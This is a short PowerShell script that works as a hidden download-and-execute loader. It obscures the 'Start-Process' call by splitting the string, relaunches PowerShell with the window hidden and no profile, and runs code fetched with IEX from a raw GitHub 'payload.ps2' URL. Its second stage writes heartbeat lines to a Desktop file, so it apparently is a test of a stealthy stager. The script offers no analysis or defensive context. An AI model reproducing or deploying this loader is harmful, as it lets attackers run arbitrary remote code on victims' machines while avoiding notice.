$u = "https://raw.githubusercontent.com/YZUs1121518/WATmidle/refs/heads/main/payload.ps2"
$a = "Start-"; $b = "Process"
$u = "https://raw.githubusercontent.com/YZUs1121518/WATmidle/refs/heads/main/payload.ps2"
if ($Args[0] -ne "SecondStage") {
    & "$a$b" powershell.exe -ArgumentList "-NoP -W Hidden -Command IEX (New-Object Net.WebClient).DownloadString('$u') SecondStage"
    exit
}

$path = "$env:USERPROFILE\Desktop\hidden_active.txt"
"Session started at $(Get-Date)" | Out-File -FilePath $path -Force
for ($i=1; $i -le 10; $i++) {
    "Heartbeat $i at $(Get-Date)" | Out-File -FilePath $path -Append
    Start-Sleep -Seconds 5
}
